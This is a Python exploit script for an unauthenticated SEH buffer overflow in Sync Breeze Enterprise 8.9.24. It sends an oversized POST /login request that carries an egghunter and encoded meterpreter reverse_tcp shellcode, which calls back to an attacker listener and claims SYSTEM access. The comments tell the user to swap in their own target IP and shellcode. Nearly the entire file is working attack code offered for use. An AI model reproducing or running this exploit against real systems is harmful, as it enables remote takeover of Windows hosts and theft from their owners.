    #!/usr/bin/python print "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit" print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" #Author website: www.tulpa-security.com #Author twitter: @tulpa_security #Exploit will land you NT AUTHORITY\SYSTEM #You do not need to be authenticated, password below is garbage #Swop out IP, shellcode and remember to adjust '\x41' for bytes #Tested on Windows 7 x86 Enterprise SP1 #Greetings to ozzie_offsec and carbonated import socket import sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.123.132',80)) #bad chars \x00\x0a\x0d\x26 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest #payload size 308 buf = "" buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" #pop pop ret 10030991 nseh = "\x90\x90\xEB\x0B" seh = "\x91\x09\x03\x10" egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" evil = "POST /login HTTP/1.1\r\n" evil += "Host: 192.168.123.132\r\n" evil += "User-Agent: Mozilla/5.0\r\n" evil += "Connection: close\r\n" evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" evil += "Accept-Language: en-us,en;q=0.5\r\n" evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" evil += "Keep-Alive: 300\r\n" evil += "Proxy-Connection: keep-alive\r\n" evil += "Content-Type: application/x-www-form-urlencoded\r\n" evil += "Content-Length: 17000\r\n\r\n" evil += "username=admin" evil += "&password=aaaaa\r\n" evil += "\x41" * 12292 #subtract/add for payload evil += "w00tw00t" evil += "\x90" * 20 evil += buf evil += "\x90" * 50 evil += "\x42" * 1614 evil += nseh evil += seh evil += "\x90" * 20 evil += egghunter evil += "\x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' s.close()
×